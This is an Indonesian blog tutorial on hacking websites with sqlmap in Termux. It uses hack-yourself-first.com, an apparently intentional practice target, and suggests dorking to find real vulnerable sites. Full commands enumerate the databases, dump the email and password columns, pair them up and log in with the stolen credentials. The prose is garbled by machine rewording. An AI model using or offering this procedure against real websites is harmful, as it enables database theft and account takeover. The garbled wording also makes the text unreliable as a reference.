SQLMAP merupakan hack tool yang sanggup di gunakan di atas linux untuk melaksanakan sql injection, dan mengetes ketebalan sebuah website, dengan melaksanakan request HTTP dari sebuah website memakai teknik :
- boolean based blind
- time based blind
- error based
- union query-based
- stacked queries
Selain itu, jikalau kita telah mempunyai link yang vulnerable (rentan) dari sebuah website, kita sanggup dengan gampang melihat seluruh isu web tersebut, mulai tables, kolom, dan isinya menyerupai admin, email, password.
Dan kalo belum, kalian harus mengetahui terlebih dahulu link mana yang vulnerable, dan untuk mencari link tersebut, teman sanggup melaksanakan dengan cara manual, yaitu mencari pada bab setiap halaman pages, sanggup juga mencari dengan derma tools menyerupai RED_HAWK, dan sanggup juga mencari dengan metode dorking melalui pencarian page google.
*Terkadang RED_HAWK suka tidak niscaya dalam menginformasikan link vulnerable, justru yang vulnerable, malah di bilang tidak vulnerable.
Jadi, harap hati-hati.
Biasanya link vulnerable itu ada alasannya ialah si pembuat link "lupa" dalam melaksanakan escape pada sebuah parameter, biasanya pada bab "id".
Dan id yang mempunyai escape, dan di paksakan untuk di inject, maka akan muncul critical/error menyerupai ini :
Atau sanggup juga pada bab lable atau kategori, tapi jangan selalu di jadikan patokan ya, alasannya ialah setiap web mempunyai link vulnerable yang berbeda.
Dan berikut ialah pola link vulnerable kategori yang saya dapatkan dari suatu website :
http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12
Link di atas sangat aman, dan siap untuk di inject dengan sqlmap.
Dan sebelum kita memulai injection, kita harus mengetahui dulu dasar-dasar perintah pada sqlmap, dan yang paling umum, serta sering di gunakan ialah ini :
- -u untuk mengambil url
- -D induk databases
- -T induk tables
- -C induk column
- -h help
- -v verbosity
- --dbs untuk mengkalkulasi database
- --tables untuk membuka tables dari database
- --columns untuk membuka kolom dari table
- --dump untuk menghasilkan output .csv dari database
sisanya sanggup kalian pelajari sendiri di sini :
https://github.com/sqlmapproject/sqlmap/wiki/Usage
Selanjutnya ialah cara melaksanakan inject terhadap link, dan berikut caranya :
Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP
#1. kalian harus memasang bahasa python2 dulu, lakukan menyerupai biasa : pkg install python2
#2. Jika sudah, teman sanggup membuka lazymux, kemudian cari dan pasang sqlmap.
Belum punya lazymux ? baca artikel di bawah ini dulu sob :
Cara memasang lazymux di Termux Android - by
#3. Kemudian, buka folder sqlmap, dan test programnya apakah sanggup jalan atau tidak dengan mengetikan perintah : python2 sqlmap.py
#4. Jika bisa, Selanjutnya ialah mengkalkulasi database dari sebuah website, dan yang kita perlukan ialah perintah -u untuk mengambil URL, dan --dbs untuk kalkulasi database, maka perintahnya ialah :
python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 --dbs
Kemudian pencet enter, dan biarkan sqlmap mengkalkulasi database, dan sehabis selesai, akan muncul daftar databasesnya, selanjutnya kita perlu mengakses database yang kita inginkan.
#5. Dan kini kita ingin melihat tables yang ada di dalam database hackyourselffirst_db, maka perintah yang akan di gunakan ialah -u untuk mengambil url, -D untuk induk database yang di pakai, kemudian --tables untuk membuka tables dari induk database hackyourselffirst_db.
python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 -D hackyourselffirst_db --tables
Kemudian pencet enter, maka akan muncul tables dari induk database hackyourselffirst_db.
#6. Selanjutnya kita perlu menentukan column yang ingin kita lihat dari sebuah tables, contohnya saya ingin melihat isi column dari tables UserProfile.
Maka perintah yang di gunakan ialah -u untuk mengambil url, -D induk database yang di pakai, -T tables yang akan di pakai, --columns untuk menampilkan column (kolom).
python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 -D hackyourselffirst_db -T UserProfile --columns
Kemudian pencet enter, maka akan tampil banyaknya column yang berhasil terindex dari table UserProfile.
#7. Terakhir ialah kita hanya perlu melihat isi columnnya, nah column ini berisi infromasi, bukan menyerupai tables, dan induk lagi.
Yang mana, teman sanggup mencari id_card, address, email, password jikalau memang tersedia.
Maka perintah yang di gunakan ialah -u untuk mengambil url, -D untuk induk database yang di pakai, -T untuk induk tables yang di pakai, -C untuk induk column yang akan di pakai.
Di sini, saya memakai column email, dan tambahkan --dump untuk pribadi mengoutput, atau menyimpan isi dari column email dalam bentuk .csv ke folder parent yang ada di aplikasi termux.
python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 -D hackyourselffirst_db -T UserProfile -C Email --dump
Kemudian pencet enter, maka akan pribadi di tampilkan isi dari column email, serta pribadi di save ke folder parent di aplikasi termux.
#8. Dan untuk kembali, jangan pencet back, tapi arahkan ke tables dan columnnya, contohnya mau ambil password, maka cukup masukan kembali perintah ini :
python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 -D hackyourselffirst_db -T UserProfile -C Password --dump
Atau, kalo mau pindah database, cukup masukan perintah :
python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 --dbs
Nah sehabis melaksanakan injection, kita sudah mempunyai isu dari website tersebut, dan jikalau kita ingin mendapat isu embel-embel menyerupai http header dan body yang berisi xml, dan arahan google analytic, kita perlu memakai perintah verbosity atau -v
Apa itu verbosity ?
Verbosity merupakan perintah sqlmap untuk melihat payload apa saja yang di kirim pada HTTP request, dan verbosity mempunyai tingkatan level, mulai dari 1 hingga 6, dan tingkatan tertinggi ialah level yang ke 6, dimana teman sanggup melihat http body dan header secara keseluruhan.
Lalu, untuk memakai verbosity ini caranya sangat mudah, cukup tambahkan -v LEVEL di belakang url.
Maka balasannya akan menyerupai ini :
python2 sqlmap.py -u http://hack-yourself-first.com/CarsByCylinders?Cylinders=V12 -v 6
Hasil dari verbosity :
Nah itu lah cara yang paling gampang dalam mengambil isu dari sebuah website, dan kenapa gampang ? alasannya ialah cara di atas pribadi memakai link vulnerable, sehingga tidak perlu memakai parameter serta dorking, jadi prosesnya sanggup lebih cepat, dan tidak ada error critical.
Kemudian, jikalau proses dump tadi sudah selesai, teman sanggup melihat file .csv hasil dump di com.termux/files/home/.sqlmap/output
Dan menyerupai ini cara mengaksesnya :
$ls
$cd .sqlmap
$cd output
$ ls
$ cd hack-yourself-first.com
$ ls
$ cd dump
$ ls
$ cd hackyourselffirst_db
$ ls
$cat UserProfile.csv
atau sanggup juga di buka memakai nano
kemudian, tinggal teman simpan saja email, dan passwordnya ke dalam file, sanggup txt, doc atau csv, kemudian cara menyesuaikan password dengan email ialah dengan mengurutkannya.
Jika teman ingin memakai email pada urutan ke 5, maka passwordnya juga ada di urutan ke 5, paham kan ?.
Apabila email dan passwordnya sudah dapat, teman cukup login saja untuk mengetest berhasil atau tidak, dan untuk login, teman sanggup kunjungi link ini, kemudian cari hidangan login :
http://hack-yourself-first.com
Itu lah cara melaksanakan injection terhadap website memakai sqlmap, dan pakai cara ini sebijak mungkin, dan jangan merugikan orang lain.
Sekian, dan hingga jumpa di tutorial ngoprek berikutnya.
Jangan lupa kunjungi channel Cuman-Android untuk mendapat tutorial keren lainnya :
https://www.youtube.com/channel/UCu3LMeX2xlqBZl7cBlXz8JA Sumber https://joeyxtei.blogspot.com
